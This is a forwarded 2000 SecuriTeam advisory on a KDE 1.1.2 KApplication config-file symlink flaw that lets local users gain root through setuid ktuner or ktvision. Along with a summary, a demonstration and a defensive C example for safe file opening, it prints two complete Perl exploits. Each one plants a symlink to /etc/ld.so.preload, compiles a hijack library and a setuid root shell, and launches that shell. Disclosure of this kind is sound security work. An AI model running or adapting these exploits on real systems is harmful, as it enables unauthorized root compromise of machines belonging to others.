o----=[ Penguin @ My - Linux ([EMAIL PROTECTED]) ]=----o
Assalamualaikum,
For everyone's attention.
Wassalam.
:)
-------- Original Message --------
Subject: [UNIX] KDE KApplication {} config file problem can lead to root compromise
Date: Fri, 2 Jun 2000 01:55:35 +0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
KDE KApplication {} config file problem can lead to root compromise
--------------------------------------------------------------------------------
SUMMARY
A bug in KDE's configuration-file handling enables local users to obtain root
access. Because the KApplication class creates configuration files insecurely,
local users can make setuid-root KDE programs create arbitrary files. This can
result in a complete compromise of the system.
DETAILS
Vulnerable systems:
KDE 1.1.2 (as shipped with SuSE 6.4)
Impact:
An attacker may gain root access to a system where a vulnerable KDE
distribution is installed. Due to the GUI nature of KDE, it might be
difficult for an attacker to gain a root shell on a remote system; however,
the attacker could modify the DISPLAY environment variable to redirect the
output to one of her own machines. A vulnerable system must have at least one
set-user-id program installed that uses the KApplication class; ktvision and
ktuner are two such examples.
Example:
$ nl /tmp/a.out.cc
1 #include <string.h>
2 #include <stdlib.h>
3 #include <stdio.h>
4 #include <kapp.h>
5 int main(int argc, char **argv)
6 {
7 KApplication *base = new KApplication(argc, argv);
8 base->exec();
9 return 0;
10 }
11
$ ls -la /etc/foo
ls: /etc/foo: No such file or directory
$ ln -s /etc/foo ~/.kde/share/config/a.outrc
$ ls -la /tmp/a.out
-rwsr-sr-x 1 root root 19450 May 28 14:14 /tmp/a.out
$ /tmp/a.out
^C
$ ls -la /etc/foo
-rw-rw-rw- 1 stealth 500 0 May 28 14:26 /etc/foo
Solution:
As a temporary solution, remove the setuid-root bit from the affected programs.
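The durable fix is in the program rather than in the file mode: a privileged process must not follow a user-controlled symlink when it creates the rc file. The following is an added example in C (not the advisory's or KDE's code) of such an open, using O_NOFOLLOW plus an fstat check on the descriptor actually opened; `safe_open_rc`, `demo` and the scratch directory under /tmp are constructed for this illustration, and the caller is assumed to have already switched its effective uid to the user before touching files under the user's home, so a freshly created file belongs to `owner`.

```c
#define _GNU_SOURCE              /* mkdtemp(), O_NOFOLLOW */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open (creating if needed) a per-user rc file on behalf of a privileged
 * process. A symlink planted at the path is refused instead of followed,
 * and the object actually opened must be a regular file owned by `owner`.
 * Assumes the caller already runs with the user's effective uid. */
int safe_open_rc(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: a symlink at the last component fails with ELOOP, so the
     * create cannot be redirected to /etc/ld.so.preload. Mode 0600 (not 0666)
     * means even the exploit's umask 0 cannot yield a world-writable file. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_NOCTTY, 0600);
    if (fd < 0)
        return -1;
    /* Check the descriptor, not the path: no window for a swap in between. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario mirroring the advisory: `foorc` in a scratch dir is a
 * symlink to a file that must never be created. Returns 1 when the link is
 * rejected (target stays absent) and a later honest create yields a file
 * with no group/other permission bits. */
int demo(void)
{
    char dir[] = "/tmp/rcdemo.XXXXXX", rc[64], target[64];
    struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(rc, sizeof rc, "%s/foorc", dir);
    snprintf(target, sizeof target, "%s/preload", dir);
    if (symlink(target, rc) != 0) return 0;        /* the planted link */
    int fd = safe_open_rc(rc, getuid());
    int rejected = fd < 0 && errno == ELOOP && access(target, F_OK) != 0;
    if (fd >= 0) close(fd);
    unlink(rc);                                    /* now an honest create */
    fd = safe_open_rc(rc, getuid());
    int created = fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 0077) == 0;
    if (fd >= 0) close(fd);
    unlink(rc); unlink(target); rmdir(dir);
    return rejected && created;
}
```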
Exploit:
--- ktuner exploit code ---
#!/usr/bin/perl
#
# 7350ktuner! The ktuner-hack.
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
#
my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";
$ENV{"PATH"}.=":/opt/kde/bin";
print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
int time(void *v)
{
    chown("/tmp/boomsh", 0, 0);
    chmod("/tmp/boomsh", 06755);
    unlink("/etc/ld.so.preload");
    exit(1);
}
_EOF_
close O;
print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main()
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;
print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;
umask 0;
unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;
print "Invoking vulnerable program (ktuner)...\n";
if (fork() == 0) {
    `ktuner`;
    exit 0;
} else {
    sleep(3);
    kill 9, `pidof ktuner`;
}
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;
# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
--- ktuner exploit code ---
--- ktvision exploit code ---
#!/usr/bin/perl
#
# 7350ktvision! The ktvision-hack.
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# Special greets to that beautiful black-dressed woman at
# the bus stop. This one is for you. :)
#
my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";
$ENV{"PATH"}.=":/opt/kde/bin";
print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
int time(void *v)
{
    chown("/tmp/boomsh", 0, 0);
    chmod("/tmp/boomsh", 06755);
    unlink("/etc/ld.so.preload");
    exit(1);
}
_EOF_
close O;
print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main()
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;
print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;
umask 0;
unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;
print "Invoking vulnerable program (ktvision)...\n";
if (fork() == 0) {
    `ktvision`;
    exit 0;
} else {
    sleep(3);
    kill 9, `pidof ktvision`;
}
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;
# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
--- ktvision exploit code ---
ADDITIONAL INFORMATION
The information has been provided by Sebastian Krahmer: <mailto:[EMAIL PROTECTED]>
========================================
This bulletin is sent to members of the SecuriTeam mailing list.